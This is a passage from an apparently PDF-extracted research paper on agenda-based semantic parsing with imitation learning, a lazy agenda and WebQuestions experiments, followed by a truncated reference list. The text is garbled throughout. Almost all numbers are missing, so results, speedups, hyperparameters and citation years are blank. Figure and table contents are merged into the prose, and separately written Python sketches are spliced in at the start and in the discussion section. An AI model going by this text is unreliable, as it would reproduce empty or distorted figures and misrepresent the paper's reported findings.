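two pieces of the model above are easy to spell out: the log-linear distribution pθ(d | D) over a set of derivations, and the reward r(d), which is the f1 score between the predicted and gold entity sets. a small sketch with feature vectors represented as plain dicts; the data passed in would be placeholders.

import math

def p_theta(feature_vectors, theta):
    # softmax over derivations; each feature vector is a dict feature -> value
    scores = [sum(theta.get(f, 0.0) * v for f, v in phi.items())
              for phi in feature_vectors]
    z = sum(math.exp(s) for s in scores)
    return [math.exp(s) / z for s in scores]

def reward(predicted_entities, gold_entities):
    # f1 between predicted and gold entity sets, in [0, 1]
    tp = len(predicted_entities & gold_entities)
    if tp == 0:
        return 0.0
    prec = tp / len(predicted_entities)
    rec = tp / len(gold_entities)
    return 2 * prec * rec / (prec + rec)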
remove add figure : a schematic illustration of a executing a parsing action, specified by a derivation on the agenda. first, we remove it from the agenda and put it in the chart. then, combine it with other chart derivations to produce new derivations, which are added back to the agenda. algorithm agenda-based parsing : procedure parse(x) : initagenda() : while |q| > ∧|hroot :|x| | < k do : dai:j ← choose derivation from q : executeaction(dai:j) : choose and return derivation from hroot :|x| : function executeaction(dai:j) : remove dai:j from q : if |hai:j| < k then : hai:j.add(d a i:j) : combine(dai:j) : function combine(dai:j) : for k > j and r = b → ac [f] ∈r do : for dcj,k ∈ h c j:k do : q.addall(f(dai:j,d c j:k)) : for k < i and r = b → c a [f] ∈r do : for dck,i ∈ h c k:i do : q.addall(f(dck:i,d a i:j)) : function initagenda() : for a → xi:j [f] ∈r do : q.addall(f(xi:j)) agenda-based parsing the idea of using an agenda for parsing has a long history (kay, ; caraballo and charniak, ; pauls and klein, ). an agenda-based parser controls the order in which derivations are con- structed using an agenda q, which contains a set of derivations to be processed. at each point in time the state of the parser consists of two sets of derivations, the chart h and the agenda q. each parsing action chooses a derivation from the agenda, moves it to the chart, combines it with other chart derivations, and adds new derivations to the agenda (figure ). algorithm describes agenda-based parsing. the algorithm shows binary rules; unary rules are treated similarly. first, we initialize the agenda by applying all rules whose rhs has only terminals, adding the resulting derivations to the agenda. then, we per- form parsing actions until either the agenda is empty or we obtain k root derivations. on each action, we first choose a derivation dai:j to remove from q and add it to hai:j, unless h a i:j already has k derivations. then, we combine dai:j with all derivations dj:k to the right and dk:i to the left. upon termination, we perform a final action, in which we return a single derivation from all constructed root derivations. the most natural way to choose an agenda deriva- tion (and the root derivation in the final action) is by taking the highest scoring derivation d = arg maxd∈q s(d). most work on agenda-based pars- ing generally assumed that the scoring function s is learned separately (e.g., from maximum likelihood estimation of a generative pcfg). furthermore, they assumed that s satisfies the decomposition property (section ), which guarantees obtaining the high- est scoring root derivation in the end. we, on the other hand, make no assumptions on s, and follow- ing jiang et al. ( ), we learn a scoring function that is tightly coupled with agenda-based parsing. this is the topic of the next section. learning a scoring function the objective in ( ) is based on only a distribution over root derivations. thus, by optimizing it, we do not explicitly learn anything about partial deriva- tions that never make it to the root. consider the derivation in figure over the phrase “lincoln” with the logical form usslincoln. if none of the k root derivations contains this partial derivation, ( ) will not penalize it, and we might repeatedly construct it even though it is useless. to discourage this, we need to be sensitive to intermediate parsing stages. . imitation learning we adapt the approach of jiang et al. ( ) for agenda-based syntactic parsing to semantic parsing. 
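before turning to learning, here is a minimal python sketch of the agenda loop in the agenda-based parsing algorithm above, to make the control flow concrete. it is schematic rather than the authors' implementation: derivations are assumed to carry a cell key (category and span), and combine, score, and is_root are stand-ins for the grammar, the scoring function, and the root test.

import heapq

def agenda_parse(initial_derivs, combine, score, is_root, k=10):
    # agenda: max-priority queue over derivations, keyed by score
    agenda = [(-score(d), i, d) for i, d in enumerate(initial_derivs)]
    heapq.heapify(agenda)
    chart = {}                       # cell (category, span) -> derivations
    roots, tie = [], len(initial_derivs)
    while agenda and len(roots) < k:
        _, _, d = heapq.heappop(agenda)        # highest-scoring agenda item
        cell = chart.setdefault(d.cell, [])
        if len(cell) >= k:                     # cell already holds k items
            continue
        cell.append(d)
        if is_root(d):
            roots.append(d)
        for new in combine(d, chart):          # combine with chart neighbours
            heapq.heappush(agenda, (-score(new), tie, new))
            tie += 1
    # final action: return one root derivation (highest-scoring here)
    return max(roots, key=score) if roots else None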
recall that a parsing state is s = (h,q), where h ⊆d is the chart and q ⊆d is the agenda. the available actions are exactly the derivations to keep the state space discrete, states do not include derivation scores. this is why in algorithm we keep a list of up to k derivations in every chart cell rather than a beam, which would require actions to depend on derivation scores. on the agenda q, and the successor state s′ is com- puted via executeaction() from algorithm . we model the policy as a log-linear distribution over (partial) agenda derivations q: pθ(a | s) = pθ(d = a | q), according to ( ). note that the state s only provides the support of the distribution; the shape depends on only features φ(a) of the chosen action a, not on other aspects of s. this simple param- eterization allows us to follow a policy efficiently: when we add a derivation a to the agenda, we insert it with priority equal to its score s(a) = φ(a)>θ. computing the best action arg maxa pθ(a | s) sim- ply involves popping from the priority queue. a history h = (s ,a , . . . ,at ,st+ ) (see fig- ure ) is a sequence of states and actions, such that s has an empty chart and an initial agenda, and st+ is a terminal state reached after performing the chart action in which we choose a root derivation at from hroot :|x| (algorithm ). the policy for choosing parsing actions induces a distribution over histories pθ(h) = ∏t t= pθ(at | st). at a high level, our policy is trained using imi- tation learning to mimic an oracle that takes a opti- mal action at every step (daume et al., ; ross et al., ). because in semantic parsing we train from questions and answers, we do not have access to an oracle. instead, we first parse x by sampling a history from the current policy pθ; let d∗ be the root derivation with highest reward out of the k root derivations constructed (see ( )). we then generate a target history htarget from d∗ using two ideas—local reweighting and history compression, which we ex- plain shortly. the policy parameters θ are then up- dated as follows: θ ← θ + η r(htarget) t∑ t= δt(htarget), ( ) δt(h) = ∇θ log pθ(at | st) ( ) = φ(at)−epθ(a′t|st)[φ(a ′ t)]. the reward r(h) = r(at ) ∈ [ , ] measures the compatibility of the returned derivation (see ( )), and η is the learning rate. note that while our fea- note that unlike standard policy gradient, our updates are not invariant (even in expectation) to shifting the reward by a constant. our updates do not maximize reward, but the reward merely provides a way to modulate the magnitude of the up- dates. st− st st+ at− at figure : a schematic illustration of a (partial) history of states and actions. each ellipse represents a state (chart and agenda), and the red path marks the actions chosen. tures φ(a) depend on the action only, the update rule takes into account all actions that are on the agenda. local reweighting. given the reference d∗, let i[a in d∗] indicate whether an action a is a sub- derivation of d∗. we sample htarget from the lo- cally reweighted distribution p+wθ (a | s) ∝ pθ(a | s)·exp{β i[a in d∗]} for some β > . this is a mul- tiplicative interpolation of the model distribution pθ and the oracle. when β is high, this reduces to sam- pling from the available actions in d∗. when no or- acle actions are available, this reduces to sampling from pθ. the probability of a history is defined as p+wθ (h) = ∏t t= p +w θ (at | st). recall we construct k root derivations. 
a prob- lem with local reweighting is that after adding d∗ to the chart, there are no more oracle actions on the agenda and all subsequent actions are simply sam- pled from the model. we found that updating to- wards these actions hurts accuracy. to avoid this problem, we propose performing history compres- sion, described next. history compression. given d∗, we can define for every history h a sequence of indices (t , t , . . .) such that i[ati in d ∗] = for every i. then, the compressed history c(h) = (st ,at ,st ,at , . . .) is a sequence of states and actions such that all actions choose sub-derivations of d∗. note that c(h) is not a “real history” in the sense that tak- ing action ati does not necessarily result in state sti+ . in figure , the compressed history c(h) = (s ,a ,s ,a ,s ,a ,s ). we can now sample a target history htarget for ( ) from a distribution over compressed histories, a = d ∗ h : a a s s s s s a a a a figure : an example history of states and actions, where ac- tions that are part of the reference derivation d∗ = a are in red. the compressed history is c(h) = (s ,a ,s ,a ,s ,a ,s ). algorithm learning algorithm procedure learn({xi,yi}ni= ) θ ← for each iteration τ and example i do h ← parse(pθ,xi) d∗ ← chooseoracle(h ) htarget ← parse(p+cwθ ,xi) θ ← θ + ητ,i ·r(htarget) ∑t t= δt(htarget) p+cθ (h) = ∑ h′:c(h′)=h pθ(h), where we marginal- ize over all histories that have the same compressed history. to sample from p+cθ , we sample h ′ ∼ pθ and return htarget = c(h′). this will provide a his- tory containing only actions leading to the oracle d∗. in our full model, we sample a history from p+cwθ , which combines local reweighting and his- tory compression: we sample h′ ∼ p+wθ and re- turn htarget = c(h′). we empirically analyze local reweighting and history compression in section . in practice, we set β large enough so that the be- havior of p+cwθ is as follows: we first construct the reference d∗ by sampling oracle actions. after con- structing d∗, no oracle actions are on the agenda, so we construct k − more root derivations, sampling from pθ (but note these actions are not part of the re- turned compressed history). finally, the last action chooses d∗ from the k derivations. algorithm summarizes learning. we initialize our parameters to zero, and then parse each exam- ple by sampling a history from pθ. we choose the derivation with highest reward in hroot :|x| as the ref- erence derivation d∗. this defines p+cwθ , which we sample from to update parameters. the learning rate ητ,i is set using adagrad (duchi et al., ). . related approaches our method is related to policy gradient in reinforce- ment learning (sutton et al., ): if in ( ), we sample from the model distribution pθ without an oracle, then our update is exactly the policy gradi- ent update, which maximizes the expected reward epθ(h) [r(h)]. we do not use policy gradient since the gradient is almost zero during the beginning of training, leading to slow convergence. this corrob- orates jiang et al. ( ). our method extends jiang et al. ( ) to seman- tic parsing, which poses the following challenges: (a) we train from denotations, and must obtain a ref- erence to guide learning. (b) to combat lexical un- certainty we maintain a beam of size k in each pars- ing state (we show this is important in section ). (c) we introduce history compression, which focuses the learner on the actions that produce the correct derivation rather than incorrect ones on the beam. interestingly, jiang et al. 
( ) found that imitation learning did not work well, and obtained improve- ments from interpolating with policy gradient. we found that imitation learning worked well, and in- terpolating with policy gradient did not offer further improvements. a possible explanation is that the uncertainty preserved in the k derivations in each chart cell allowed imitation learning to generalize properly, compared to jiang et al. ( ), who had just a single item in each chart cell. lazy agenda as we saw in section , a single semantic function (e.g., lex, bridge) can create hundreds of deriva- tions. scoring all these derivations when adding them to the agenda is wasteful, because most have low probability. in this section, we assume semantic functions return a derivation stream, i.e., an itera- tor that lazily computes derivations on demand. our lazy agenda g will hold derivation streams rather than derivations, and the actual agenda q will be defined only implicitly. the intuition is similar to lazy k-best parsing (huang and chiang, ), but is applied to agenda-based semantic parsing. our main assumption is that every derivation stream g = [d ,d , . . . ], is sorted by decreasing score: s(d ) ≥ s(d ) ≥ ··· (in practice, this is only approximated as we explain at the end of this sec- tion). we define the score of a derivation stream as s(g) = s(d ). at test time the only change to al- gorithm is in line , where instead of popping the g s(g[ ]) |g| u [d ] . [d , d , d , . . . ] . g s(g[ ]) |g| u [d ] . [d ] . [d ] . [d , . . . ] − . figure : unrolling a derivation where � = . and |g+| = . the stream in red on the left violates the stopping condition, and so we unroll two derivations until all streams satisfy the condition. highest scoring derivation, we pop the highest scor- ing derivation stream and process the first derivation on the stream. then, we featurize and score the next derivation on the stream if the stream is not empty, and push the stream back to the agenda. this guar- antees we will obtain the highest scoring derivation in every parsing action. however, during training we sample from a distri- bution over derivations, not just return the argmax. sampling from the distribution over streams can be quite inaccurate. suppose the agenda contains two derivation streams: g contains one derivation with score and g contains derivations with score . then we would assign g probability e e +e = . instead of the true model probability e e + e = . . the issue is that the first derivation of g is not indicative of the actual probability mass in g. our solution is simple: before sampling (line in algorithm ), we process the agenda to guarantee that the sum of probabilities of all unscored deriva- tions is smaller than �. let g be the lazy agenda and g+ ⊆ g be the subset of derivation streams that contain more than one derivation (where unscored derivations exist). if for every g ∈ g+, pθ(g) =∑ d∈g pθ(d) ≤ � |g+|, then the probability sum of all unscored derivation is small: ∑ g∈g+ p(g) ≤ �. to guarantee that pθ(g) ≤ �|g+|, we unroll g un- til this stopping condition is satisfied. unrolling a stream from g = [d ,d , . . . ] means popping d from g, constructing a singleton derivation stream gnew = [d ], pushing gnew to the agenda and scoring the remaining stream based on the next derivation s(g) = s(d ) (figure ). 
to check if p(g) ≤ �|g+|, we define the follow- ing upper bound u on p(g), which is based on the number of derivations in the stream |g|: pθ(g) = ∑ d∈g e s(d)∑ g′∈g ∑ d′∈g′ e s(d′) ≤ |g|es(g[ ])∑ g′∈g e s(g′[ ]) = u where g[ ] is the first derivation in g. checking that u ≤ �|g+| is easy, since it is based only on the first derivation of every stream. once all streams meet this criterion, we know that the total unscored prob- ability is less than �. as learning progresses, there are be many low probability derivations which we can skip entirely. the last missing piece is ensuring that streams are sorted without explicitly scoring all derivations. we make a best effort to preserve this property. sorting derivation streams. all derivations in a stream g have the same child derivations, as they were constructed by one application of a seman- tic function f. thus, the difference in their scores is only due to new features created when applying f. we can decompose these new features into two disjoint feature sets. one set includes features that depend on the grammar rule only and are indepen- dent of the input utterance x, and another also de- pends on x. for example, the semantic function f = lex maps phrases, such as “born in”, to log- ical forms, such as placeofbirthof. most features extracted by lex do not depend on x: the con- junction of “born in” and placeofbirthof, the fre- quency of the phrase “born in” in a corpus, etc. however, some features may depend on x as well. for example, if x is “what city was abraham lin- coln born in”, we can conjoin placeofbirthof with the first two words “what city”. as another ex- ample, the semantic function bridge takes unary predicates, such as abelincoln, and joins them with any type-compatible binary to produce logi- cal forms, such as placeofbirthof.abelincoln. again, a feature such as the number of assertions in k that contain placeofbirthof does not de- pend on x, while a feature that conjoins the intro- duced binary (placeofbirthof) with the main verb (“born”), does depend on x (see section ). our strategy is to pre-compute all features that are independent of x before training, and sort streams for lex, this requires going over all lexicon entries once. for bridge, this requires going once over the kb. based on these features only, as an approximation for the true order. let’s assume that derivations re- turned by an application of a semantic function f are parameterized by an auxiliary set b. for example, when applying lex on “born in”, b will include all lexical entries that map “born in” to a binary predicate. when applying bridge on abelincoln, b will include all binary predicates that are type- compatible with abelincoln. we equip each b ∈b with a feature vector φb(b) (computed before train- ing) of all features that are independent of x. this gives rise to a score sb(b) = φb(b)>θ that depends on the semantic function only. thus, we can sort b before parsing, so that when the function f is called, we do not need to instantiate the derivations. note that the parameters θ and thus sb change during learning, so we re-sort b after every iteration (of going through all training examples), yielding an approximation to the true ordering of b. in practice, features extracted by lex depend mostly on the lex- ical entry itself and our approximation is accurate, while for bridge some features depend on x, as we explain next. features the feature set in our model includes all features de- scribed in berant et al. ( ). 
in addition, we add new lexicalized features that connect natural lan- guage phrases to binary predicates. in berant et al. ( ), a binary predicate is generated using a lexicon constructed offline via alignment, or through the bridging operation. as mentioned above, bridging allows us to join unary predicates with binary predicates that are type- compatible, even when no word in the utterance trig- gers the binary predicate. for example, given the ut- terance “what money to take to sri lanka”, the parser will identify the entity srilanka, and bridging will propose all possible binaries, including currency. we add a feature template that conjoins binaries suggested by bridging (currency) with all content word lemmas (“what”, “money”, “take”). after observing enough examples, we expect the feature corresponding to “money” and currency to be up- weighted. generating freely and reweighting using as in previous work, some features use the fact that the spelling of kb predicates is often similar to english words. features can be viewed as a soft way to expand the lexicon during training, similar to lexicon generation (zettlemoyer and collins, ). note that this fea- ture depends on the utterance x, and is not used for sorting streams (section ). finally, each feature is actually duplicated: one copy fires when choosing derivations on the agenda (algorithm , line ), and the other copy fires when choosing the final root derivation (line ). we found that the increased expressivity from separating fea- tures improves accuracy. experiments we evaluate our semantic parser on the webques- tions dataset (berant et al., ), which con- tains , question-answer pairs. the questions are about popular topics (e.g., “what movies does taylor lautner play in?”) and answers are sets of entities obtained through crowdsourcing (all questions are answerable by freebase). we use the provided train- test split and perform three random %- % splits of the training data for development. we perform lexical lookup for freebase entities using the freebase search api and obtain can- didate entities for every named entity identified by stanford corenlp (manning et al., ). we use the lexicon released by berant et al. ( ) to re- trieve unary and binary predicates. we execute λ- dcs logical forms by converting them to sparql and querying our local virtuoso-backed copy of freebase. during training, we use l regularization, and crudely tune hyperparameters on the develop- ment set (beam size k = , tolerance for the lazy agenda � = . , local reweighting β = , and l regularization strength λ = − ). we evaluated our semantic parser using the re- ward of the predictions, i.e., average f score on predicted vs. true entities over all test examples. . main results table provides our key result comparing the fixed-order parser (fixedorder) and our proposed agenda-based parser (agendail). in all subse- quent tables, train, dev., and test denote train- ing, development and test accuracies, |act.| denotes we use the official evaluation script from http:// www-nlp.stanford.edu/software/sempre/. http://www-nlp.stanford.edu/software/sempre/ http://www-nlp.stanford.edu/software/sempre/ test train |act.| |feat.| time fixedorder . . , , , agendail . . , , table : test set results for the standard fixed-order parser (fixedorder) and our new agenda-based parser (agendail), which substantially reduces parsing time and the number of parsing actions at no cost to accuracy. system authors acc. yv yao and van-durme ( ) . bcfl berant et al. ( ) . 
bdzz bao et al. ( ) . bwc bordes et al. ( ) . bl berant and liang ( ) . ydzr yang et al. ( ) . bwc + bl bordes et al. ( ) . wywh wang et al. ( ) . wywh wang et al. ( ) . ychg yih et al. ( ) . fixedorder this work . agendail this work . table : results on the webquestions test set. the average number of parsing actions (pops from agenda in agendail and derivations placed on chart in fixedorder) per utterance, |feat.| de- notes the average number of featurized derivations per utterance, and time is average parsing time in milliseconds. we found that agendail is x faster than fixe- dorder, performs x fewer parsing actions, and reduces the number of featurized derivations by an order of magnitude, without loss of accuracy. table presents test set results of our systems, compared to recently published results. we note that most systems perform question answering with- out semantic parsing. our fixed-order parser, fixe- dorder, and agenda-based parser, agendail, obtain an accuracy of . and . respectively. this improves accuracy compared to all previous systems, except for a recently published semantic parser presented by yih et al. ( ), whose accu- racy is . . we attribute our accuracy improvement compared to previous systems to the new features and changes to the model, as we discuss below. bcfl also used a fixed-order parser, but ob- tained lower performance. the main differences be- tween the systems are that (i) our model includes new features (section ) combined with l regular- ization, (ii) we use the freebase search api rather than string matching, and (iii) our grammar gener- algorithm dev. |act.| |feat.| time agendail . , , fixedorder . , , , agenda . , , fixed+agenda . , , α = . , , , α = . , , α = . , , p+w θ . , , p+c θ . , , pθ . , , , -binaryandlemma . , , table : development set results for variants of agendail. ates a larger space of derivations. . analysis to gain insight into our system components, we per- form extensive experiments on the development set. comparison with fixed-order parsing. figure compares accuracy, speed at test time, and number of derivations for agendail and fixedorder. for agendail, we show both the number of derivations popped from the agenda, as well as num- ber of derivations scored, which is slightly higher due to scored derivations on the agenda. we ob- serve that for small beam sizes, agendail sub- stantially outperforms fixedorder. this is since agendail exploits small beams more efficiently in intermediate parsing states. for large beams perfor- mance is similar. in terms of speed and number of derivations, we see that agendail is dramatically more efficient than fixedorder: with beam size – , it is roughly as efficient as fixedorder with beam size – . for the chosen beam size (k = ), agendail is x faster than fixe- dorder. for k = , performance is poor for agendail and zero for fixedorder. this highlights the in- herent difficulty of mapping to logical forms com- pared to more shallow tasks, as maintaining just a single best derivation for each parsing state is not sufficient. a common variant on beam parsing is to replace the fixed beam size k with a threshold α, and prune any derivation whose probability is at least α times smaller than the best derivation in that state (zhang et al., ; bodenstab et al., ). we imple- mented this baseline and compared it to agendail beam size a c c u ra c y fixedorder agendail beam size . . . . . . . . . 
ti m e ( se c ) fixedorder agendail beam size # d e ri v a ti o n s (t h o u sa n d s) fixedorder agendail (scored) agendail (popped) figure : comparing agendail and fixedorder for various beam sizes (left: accuracy, middle: parsing time at test time in seconds, right: number of thousands of derivations scored and popped). the x-axis is on a logarithmic scale. and fixedorder in table . we see that for α = , we get a faster algorithm, but a minor drop in performance compared to fixedorder. however, this baseline still featurizes x more derivations and is x slower than agendail. impact of learning. the agenda baseline uses an agenda-based parser to approximate the gradients of ( ). that is, we update parameters as in fixe- dorder, but search for k root derivations using the agenda-based parser, described in algorithm (where we pop the highest scoring derivation). we observe that agenda featurizes x more deriva- tions compared to agendail, and results in a . drop in accuracy. this demonstrates the importance of explicitly learning to choose correct actions dur- ing intermediate stages of parsing. since on the development set, fixedorder outperformed agendail by . points, we im- plemented fixed+agenda, where a fixed-order parser is used at training time, but an agenda-based parser is used at test time. this parser featurized . x more derivations compared to agendail, is . x slower, and has slightly lower accuracy. recall that agendail samples a history from p+cwθ , that is, using local reweighting and history compression. table shows the impact of sampling from p+wθ (local reweighting), p +c θ (history compres- sion), and directly from pθ, which reduces to policy gradient. we observe that sampling from pθ directly according to policy gradient results in very low ac- curacy, as this produces derivations with zero re- ward most of the time. both local reweighting and history compression alone improve accuracy (local acc. |feat.| time tr. dev. tr. dev. tr. dev. � = . . , , , � = − . . , , , � = − . . , , , � = − . . , , , nostream . . , , , table : accuracy, number of featurized derivations, and pars- ing time for both the training set and development set when varying the value of the tolerance parameter �. reweighting is more important), but both perform worse than agendail. impact of lazy agenda. we now examine the con- tribution of the lazy agenda. note that the lazy agenda affects training time much more than test time for two reasons: (a) at test time we only need to pop the highest scoring derivation, and the overhead of a priority queue only grows logarithmically with the size of the agenda. during training, we need take a full pass over the agenda when sampling, and thus the number of items on the agenda is important; (b) at test time we never unroll derivation streams, only pop the highest scoring derivation (see section ). in brief, using the lazy agenda results in a . x speedup at training time. to understand the savings of the lazy agenda, we vary the value of the tolerance parameter �. when � is very high, we will never unroll derivation streams, because for all derivation streams u ≤ �|g+| (section ). this will be fast, but sampling could be inaccurate. as � decreases, we unroll more derivations. we also compared to the nostream baseline, where the agenda holds derivations rather than derivation streams. agendail: fixedorder: what currency does jamaica accept ? what currency does jamaica accept ? 
, , , figure : number of derivations in every chart cell for the utterance “what currency does jamaica accept?”. agendail reduces the number of derivations in chart cells compared to fixedorder. table shows the results of these experiments. naturally, the number of featurized derivations in training increases as � decreases. in particular, nostream results in a . x increase in number of featurized derivations compared to no unrolling (� = ), and . x increase compared to � = − , which is the chosen value. similarly, average train- ing time is about . x slower for nostream com- pared to � = − . accuracy does not change much for various val- ues of �. even when � = , accuracy decreases by only . points compared to � = − . unexpect- edly, nostream yields a slight drop in accuracy. feature ablation. table shows an ablation test on the new feature template we introduced that conjoins binaries and lemmas during bridging (- binaryandlemma). removing this feature tem- plate substantially reduces accuracy compared to agendail, highlighting the importance of learning new lexical associations during training. example. as a final example, figure shows typ- ical parse charts for agendail and fixedorder. agendail generates only , derivations, while fixedorder constructs , derivations, many of which are unnecessary. in summary, we demonstrated that training an agenda-based parser to choose good parsing actions through imitation learning dramatically improves ef- ficiency and speed at test time, while maintaining comparable accuracy. discussion and related work learning. in this paper, we sampled histories from a distribution that tries to target the reference derivation d∗ whenever possible. work in imita- tion learning (abbeel and ng, ; daume et al., ; ross et al., ; goldberg and nivre, ) has shown that interpolating with the model (corre- sponding to smaller β) can improve generalization. we were unable to improve accuracy by annealing β from to , so understanding this dynamic re- mains an open question. parsing. in this paper, we avoided computing k derivations in each chart cell using an agenda and learning a scoring function for choosing agenda items. a complementary and purely algorithmic so- lution is lazy k-best parsing (huang and chiang, ), or cube growing (huang and chiang, ), which do not involve learning or an agenda. simi- lar to our work, cube growing approximates the best derivations in each chart cell in the case where fea- tures do not decompose work in the past attempted to speed up inference using a simple model that is trained separately and used to prune the hypotheses considered by the main parsing model (bodenstab et al., ; fitzgerald et al., ). we on the other hand speed up inference by training a single model that learns to follow good parsing actions. work in agenda-based syntactic parsing (klein and manning, ; pauls and klein, ) focused on a* algorithms where each derivation has a prior- ity based on the derivation score (inside score), and a completion estimate (outside score). good esti- mates for the outside score result in a decrease in the number of derivations. currently actions depend on the inside score, but we could add features based on chart derivations to provide “outside” information. adding such features would present computational challenges as scores on the agenda would have to be updated as the agenda and chart are modified. 
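To make the agenda-based control flow discussed in this section concrete, the following is a minimal best-first agenda loop in Python. It is an illustrative sketch only, not the parser used in this work: the expand, score, and is_goal callbacks are placeholder assumptions, and a real semantic parser would additionally maintain a chart, learned action features, and a beam limit k on the number of popped root derivations.

```python
import heapq
import itertools

def agenda_parse(initial_items, expand, score, is_goal, max_pops=10_000):
    """Best-first agenda loop (illustrative sketch).

    expand(item)  -> iterable of new partial derivations built from `item`.
    score(item)   -> float, higher is better; in A*-style parsing this would be
                     an inside score plus an estimate of the outside score.
    is_goal(item) -> True if `item` is a complete root derivation.
    """
    counter = itertools.count()  # tie-breaker so the heap never compares items directly
    agenda = []
    for item in initial_items:
        heapq.heappush(agenda, (-score(item), next(counter), item))

    roots, pops = [], 0
    while agenda and pops < max_pops:
        _, _, item = heapq.heappop(agenda)   # pop the highest-scoring derivation
        pops += 1
        if is_goal(item):
            roots.append(item)               # at test time one could stop after k roots
            continue
        for new_item in expand(item):        # only expanded items are ever scored/featurized
            heapq.heappush(agenda, (-score(new_item), next(counter), new_item))
    return roots
```

Because derivations are scored only when they are pushed onto the agenda, the number of featurized derivations tracks the number of agenda operations rather than the size of the full chart, which is the source of the efficiency gains reported above.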
semantic parsing has been gaining momentum in recent years, but still there has been relatively lit- tle work on developing faster algorithms, especially compared to syntactic parsing (huang, ; kum- merfeld et al., ; rush and petrov, ; lewis and steedman, ). while we have obtained sig- nificant speedups, we hope to encourage new ideas that exploit the structure of semantic parsing to yield better algorithms. reproducibility. all code, data, and experiments for this paper are available on the codalab platform at https://www.codalab.org/worksheets/ x fdfad dd b baf b b b d /. acknowledgments we thank the anonymous reviewers and the action editor, jason eisner, for their thorough reviews and constructive feedback. we also gratefully acknowl- edge the support of the darpa communicating with computers (cwc) program under aro prime contract no. w nf- - - . references p. abbeel and a. ng. . apprenticeship learning via inverse reinforcement learning. in international conference on machine learning (icml). m. auli and a. lopez. . efficient ccg parsing: a* versus adaptive supertagging. in association for computational linguistics (acl). j. bao, n. duan, m. zhou, and t. zhao. . knowledge-based question answering as machine translation. in association for computational linguis- tics (acl). j. berant and p. liang. . semantic parsing via para- phrasing. in association for computational linguis- tics (acl). j. berant, a. chou, r. frostig, and p. liang. . semantic parsing on freebase from question-answer pairs. in empirical methods in natural language pro- cessing (emnlp). n. bodenstab, a. dunlop, k. hall, and b. roark. . beam-width prediction for efficient context-free pars- ing. in association for computational linguistics (acl), pages – . a. bordes, s. chopra, and j. weston. . question answering with subgraph embeddings. in empirical methods in natural language processing (emnlp). q. cai and a. yates. . large-scale semantic parsing via schema matching and lexicon extension. in asso- ciation for computational linguistics (acl). our system uses the sempre toolkit (http://nlp. stanford.edu/software/sempre). s. a. caraballo and e. charniak. . new figures of merit for best-first probabilistic chart parsing. compu- tational linguistics, : – . k. chang, a. krishnamurthy, a. agarwal, h. daume, and j. langford. . learning to search better than your teacher. arxiv. j. clarke, d. goldwasser, m. chang, and d. roth. . driving semantic parsing from the world’s re- sponse. in computational natural language learn- ing (conll), pages – . h. daume, j. langford, and d. marcu. . search- based structured prediction. machine learning, : – . j. duchi, e. hazan, and y. singer. . adaptive subgradient methods for online learning and stochas- tic optimization. in conference on learning theory (colt). n. fitzgerald, y. artzi, and l. s. zettlemoyer. . learning distributions over logical forms for refer- ring expression generation. in empirical methods in natural language processing (emnlp), pages – . y. goldberg and j. nivre. . training determinis- tic parsers with non-deterministic oracles. transac- tions of the association for computational linguistics (tacl), . google. . freebase data dumps ( - - ). https://developers.google.com/ freebase/data. l. huang and d. chiang. . better k-best parsing. in proceedings of the ninth international workshop on parsing technology, pages – . l. huang and d. chiang. . forest rescoring: faster decoding with integrated language models. in associ- ation for computational linguistics (acl). l. 
huang. . forest reranking: discriminative pars- ing with non-local features. in association for com- putational linguistics (acl). j. jiang, a. teichert, j. eisner, and h. daume. . learned prioritization for trading off accuracy and speed. in advances in neural information processing systems (nips). m. kay. . algorithm schemata and data struc- tures in syntactic processing. readings in natural language processing. d. klein and c. manning. . a* parsing: fast ex- act viterbi parse selection. in human language tech- nology and north american association for computa- tional linguistics (hlt/naacl). j. krishnamurthy and t. mitchell. . weakly super- vised training of semantic parsers. in empirical meth- ods in natural language processing and computa- tional natural language learning (emnlp/conll), pages – . https://www.codalab.org/worksheets/ x fdfad dd b baf b b b d / https://www.codalab.org/worksheets/ x fdfad dd b baf b b b d / http://nlp.stanford.edu/software/sempre http://nlp.stanford.edu/software/sempre https://developers.google.com/freebase/data https://developers.google.com/freebase/data j. kummerfeld, j. roesner, t. dawborn, j. haggerty, j. curran, and s. clark. . faster parsing by supertagger adaptation. in association for computa- tional linguistics (acl). t. kwiatkowski, l. zettlemoyer, s. goldwater, and m. steedman. . inducing probabilistic ccg grammars from logical form with higher-order unifi- cation. in empirical methods in natural language processing (emnlp), pages – . t. kwiatkowski, e. choi, y. artzi, and l. zettlemoyer. . scaling semantic parsers with on-the-fly ontol- ogy matching. in empirical methods in natural lan- guage processing (emnlp). m. lewis and m. steedman. . a* ccg parsing with a supertag-factored model. in empirical methods in natural language processing (emnlp). p. liang, m. i. jordan, and d. klein. . learning dependency-based compositional semantics. in as- sociation for computational linguistics (acl), pages – . p. liang. . lambda dependency-based composi- tional semantics. arxiv. c. d. manning, m. surdeanu, j. bauer, j. finkel, s. j. bethard, and d. mcclosky. . the stanford corenlp natural language processing toolkit. in acl system demonstrations. c. matuszek, n. fitzgerald, l. zettlemoyer, l. bo, and d. fox. . a joint model of language and per- ception for grounded attribute learning. in inter- national conference on machine learning (icml), pages – . a. pauls and d. klein. . k-best a* parsing. in as- sociation for computational linguistics (acl), pages – . s. ross, g. gordon, and a. bagnell. . a reduction of imitation learning and structured prediction to no- regret online learning. in artificial intelligence and statistics (aistats). a. rush and s. petrov. . vine pruning for efficient multi-pass dependency parsing. in human language technology and north american association for com- putational linguistics (hlt/naacl). r. sutton, d. mcallester, s. singh, and y. mansour. . policy gradient methods for reinforcement learning with function approximation. in advances in neural information processing systems (nips). s. tellex, t. kollar, s. dickerson, m. r. walter, a. g. banerjee, s. j. teller, and n. roy. . understand- ing natural language commands for robotic navigation and mobile manipulation. in association for the ad- vancement of artificial intelligence (aaai). z. wang, s. yan, h. wang, and x. huang. . an overview of microsoft deep qa system on stan- ford webquestions benchmark. technical report, mi- crosoft research. y. w. wong and r. j. mooney. . 
